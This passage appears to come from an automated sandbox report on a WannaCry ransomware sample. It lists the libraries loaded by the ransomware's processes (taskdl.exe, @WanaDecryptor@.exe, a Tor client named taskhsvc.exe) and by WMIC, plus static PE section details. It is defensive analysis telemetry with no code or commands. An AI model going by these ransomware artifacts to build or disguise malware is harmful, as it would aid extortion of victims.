              Source: C:\Users\user\Desktop\taskdl.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\Desktop\taskdl.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\Desktop\taskdl.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\Desktop\taskdl.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\Desktop\taskdl.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\Desktop\taskdl.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\Desktop\taskdl.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\Desktop\taskdl.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\Desktop\taskdl.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\Desktop\taskdl.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\Desktop\taskdl.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\Desktop\taskdl.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\Desktop\taskdl.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\Desktop\taskdl.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\Desktop\taskdl.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\Desktop\taskdl.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\Desktop\taskdl.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\Desktop\taskdl.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\Desktop\taskdl.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\Desktop\taskdl.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\Desktop\taskdl.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\Desktop\taskdl.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\Desktop\taskdl.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\Desktop\taskdl.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\Desktop\taskdl.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\Desktop\taskdl.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\Desktop\taskdl.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\Desktop\taskdl.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\Desktop\taskdl.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\Desktop\taskdl.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\Desktop\taskdl.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\Desktop\taskdl.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\Desktop\taskdl.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\Desktop\taskdl.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\Desktop\taskdl.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\Desktop\taskdl.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\Desktop\taskdl.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\Desktop\taskdl.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\Desktop\taskdl.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\Desktop\taskdl.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\Desktop\taskdl.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: apphelp.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: mfc42.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: urlmon.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: wininet.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: iertutil.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: srvcli.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: netutils.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: riched32.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: riched20.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: usp10.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: msls31.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: uxtheme.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: mswsock.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: ntmarta.dll
              Source: C:\Users\user\Desktop\taskdl.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: mfc42.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: urlmon.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: wininet.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: iertutil.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: srvcli.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: netutils.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: riched32.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: riched20.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: usp10.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: msls31.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: uxtheme.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: windows.storage.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: wldp.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: ntmarta.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: kernel.appcore.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: textinputframework.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: coreuicomponents.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: coremessaging.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: coremessaging.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: wintypes.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: wintypes.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: wintypes.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: textshaping.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: mfc42.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: urlmon.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: wininet.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: iertutil.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: srvcli.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: netutils.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: riched32.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: riched20.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: usp10.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: msls31.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: uxtheme.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: windows.storage.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: wldp.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: kernel.appcore.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: propsys.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: profapi.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: edputil.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: windows.staterepositoryps.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: sspicli.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: wintypes.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: appresolver.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: bcp47langs.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: slc.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: userenv.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: sppc.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: onecorecommonproxystub.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: onecoreuapcommonproxystub.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: mpr.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: pcacli.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: sfc_os.dll
              Source: C:\Users\user\Desktop\taskdl.exeSection loaded: msvcp60.dll
              Source: C:\Windows\System32\consent.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\consent.exeSection loaded: samcli.dll
              Source: C:\Windows\System32\consent.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\consent.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\consent.exeSection loaded: wmsgapi.dll
              Source: C:\Windows\System32\consent.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\consent.exeSection loaded: msctfmonitor.dll
              Source: C:\Windows\System32\consent.exeSection loaded: msimg32.dll
              Source: C:\Windows\System32\consent.exeSection loaded: winsta.dll
              Source: C:\Windows\System32\consent.exeSection loaded: wtsapi32.dll
              Source: C:\Windows\System32\consent.exeSection loaded: msutb.dll
              Source: C:\Windows\System32\consent.exeSection loaded: winsta.dll
              Source: C:\Windows\System32\consent.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\consent.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\consent.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\consent.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\consent.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\consent.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\consent.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\consent.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\consent.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\consent.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\consent.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\consent.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\consent.exeSection loaded: propsys.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: mfc42.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: urlmon.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: wininet.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: iertutil.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: srvcli.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: netutils.dll
              Source: C:\Users\user\Desktop\taskdl.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: mfc42.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: urlmon.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: wininet.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: iertutil.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: srvcli.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: netutils.dll
              Source: C:\Users\user\Desktop\taskdl.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: mfc42.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: urlmon.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: wininet.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: iertutil.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: srvcli.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: netutils.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: mfc42.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: urlmon.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: wininet.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: iertutil.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: srvcli.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: netutils.dll
              Source: C:\Users\user\Desktop\taskdl.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: mfc42.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: urlmon.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: wininet.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: iertutil.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: srvcli.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: netutils.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: mfc42.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: urlmon.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: wininet.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: iertutil.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: srvcli.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: netutils.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: framedynos.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: msxml6.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: urlmon.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: iertutil.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: srvcli.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: netutils.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: vcruntime140.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: amsi.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: userenv.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: profapi.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: version.dll
              Source: C:\Users\user\Desktop\taskdl.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: mfc42.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: urlmon.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: wininet.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: iertutil.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: srvcli.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: netutils.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: mfc42.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: urlmon.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: wininet.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: iertutil.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: srvcli.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: netutils.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: mfc42.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: urlmon.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: wininet.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: iertutil.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: srvcli.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: netutils.dll
              Source: C:\Users\user\Desktop\taskdl.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: mfc42.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: urlmon.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: wininet.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: iertutil.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: srvcli.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: netutils.dll
              Source: C:\Users\user\Desktop\taskdl.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: mfc42.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: urlmon.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: wininet.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: iertutil.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: srvcli.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: netutils.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: mfc42.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: urlmon.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: wininet.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: iertutil.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: srvcli.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: netutils.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: mfc42.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: urlmon.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: iertutil.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: srvcli.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: netutils.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: wininet.dll
              Source: C:\Users\user\Desktop\taskdl.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: mfc42.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: urlmon.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: wininet.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: iertutil.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: srvcli.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: netutils.dll
              Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeSection loaded: apphelp.dll
              Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeSection loaded: libevent-2-0-5.dll
              Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeSection loaded: libssp-0.dll
              Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeSection loaded: libeay32.dll
              Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeSection loaded: ssleay32.dll
              Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeSection loaded: zlib1.dll
              Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeSection loaded: libssp-0.dll
              Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeSection loaded: libgcc_s_sjlj-1.dll
              Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeSection loaded: libgcc_s_sjlj-1.dll
              Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeSection loaded: cryptsp.dll
              Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeSection loaded: rsaenh.dll
              Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeSection loaded: cryptbase.dll
              Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeSection loaded: netapi32.dll
              Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeSection loaded: netutils.dll
              Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeSection loaded: wkscli.dll
              Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeSection loaded: srvcli.dll
              Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeSection loaded: netapi32.dll
              Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeSection loaded: netutils.dll
              Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeSection loaded: wkscli.dll
              Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeSection loaded: srvcli.dll
              Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeSection loaded: windows.storage.dll
              Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeSection loaded: wldp.dll
              Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeSection loaded: kernel.appcore.dll
              Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeSection loaded: uxtheme.dll
              Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeSection loaded: propsys.dll
              Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeSection loaded: profapi.dll
              Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeSection loaded: mswsock.dll
              Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeSection loaded: netapi32.dll
              Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeSection loaded: netutils.dll
              Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeSection loaded: wkscli.dll
              Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeSection loaded: srvcli.dll
              Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeSection loaded: iphlpapi.dll
              Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeSection loaded: dhcpcsvc6.dll
              Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeSection loaded: dhcpcsvc.dll
              Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeSection loaded: dnsapi.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: mfc42.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: urlmon.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: wininet.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: iertutil.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: srvcli.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: netutils.dll
              Source: C:\Users\user\Desktop\taskdl.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: mfc42.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: urlmon.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: wininet.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: iertutil.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: srvcli.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: netutils.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: mfc42.dll
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: urlmon.dll
              Source: C:\Program Files\7-Zip\7zG.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{56FDF344-FD6D-11d0-958A-006097C9A090}\InProcServer32Jump to behavior
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeWindow found: window name: RICHEDIT
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeFile opened: C:\Windows\SysWOW64\RICHED32.DLL
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: WannaCry.bin.zipStatic file information: File size 3483686 > 1048576
              Source: libeay32.dll.79.drStatic PE information: section name: /4
              Source: libeay32.dll.79.drStatic PE information: section name: /19
              Source: libeay32.dll.79.drStatic PE information: section name: /31
              Source: libeay32.dll.79.drStatic PE information: section name: /45
              Source: libeay32.dll.79.drStatic PE information: section name: /57
              Source: libeay32.dll.79.drStatic PE information: section name: /70
              Source: libeay32.dll.79.drStatic PE information: section name: /81
              Source: libeay32.dll.79.drStatic PE information: section name: /92
              Source: libevent-2-0-5.dll.79.drStatic PE information: section name: /4
              Source: libevent-2-0-5.dll.79.drStatic PE information: section name: /19
              Source: libevent-2-0-5.dll.79.drStatic PE information: section name: /31
              Source: libevent-2-0-5.dll.79.drStatic PE information: section name: /45
              Source: libevent-2-0-5.dll.79.drStatic PE information: section name: /57
              Source: libevent-2-0-5.dll.79.drStatic PE information: section name: /70
              Source: libevent-2-0-5.dll.79.drStatic PE information: section name: /81
              Source: libevent-2-0-5.dll.79.drStatic PE information: section name: /92
              Source: libevent_core-2-0-5.dll.79.drStatic PE information: section name: /4
              Source: libevent_core-2-0-5.dll.79.drStatic PE information: section name: /19
              Source: libevent_core-2-0-5.dll.79.drStatic PE information: section name: /31
              Source: libevent_core-2-0-5.dll.79.drStatic PE information: section name: /45
              Source: libevent_core-2-0-5.dll.79.drStatic PE information: section name: /57
              Source: libevent_core-2-0-5.dll.79.drStatic PE information: section name: /70
              Source: libevent_core-2-0-5.dll.79.drStatic PE information: section name: /81
              Source: libevent_core-2-0-5.dll.79.drStatic PE information: section name: /92
              Source: libevent_extra-2-0-5.dll.79.drStatic PE information: section name: /4
              Source: libevent_extra-2-0-5.dll.79.drStatic PE information: section name: /19
              Source: libevent_extra-2-0-5.dll.79.drStatic PE information: section name: /31
              Source: libevent_extra-2-0-5.dll.79.drStatic PE information: section name: /45
              Source: libevent_extra-2-0-5.dll.79.drStatic PE information: section name: /57
              Source: libevent_extra-2-0-5.dll.79.drStatic PE information: section name: /70
              Source: libevent_extra-2-0-5.dll.79.drStatic PE information: section name: /81
              Source: libevent_extra-2-0-5.dll.79.drStatic PE information: section name: /92
              Source: libgcc_s_sjlj-1.dll.79.drStatic PE information: section name: /4
              Source: libgcc_s_sjlj-1.dll.79.drStatic PE information: section name: /19
              Source: libgcc_s_sjlj-1.dll.79.drStatic PE information: section name: /31
              Source: libgcc_s_sjlj-1.dll.79.drStatic PE information: section name: /45
              Source: libgcc_s_sjlj-1.dll.79.drStatic PE information: section name: /57
              Source: libgcc_s_sjlj-1.dll.79.drStatic PE information: section name: /70
              Source: libgcc_s_sjlj-1.dll.79.drStatic PE information: section name: /81
              Source: libgcc_s_sjlj-1.dll.79.drStatic PE information: section name: /92
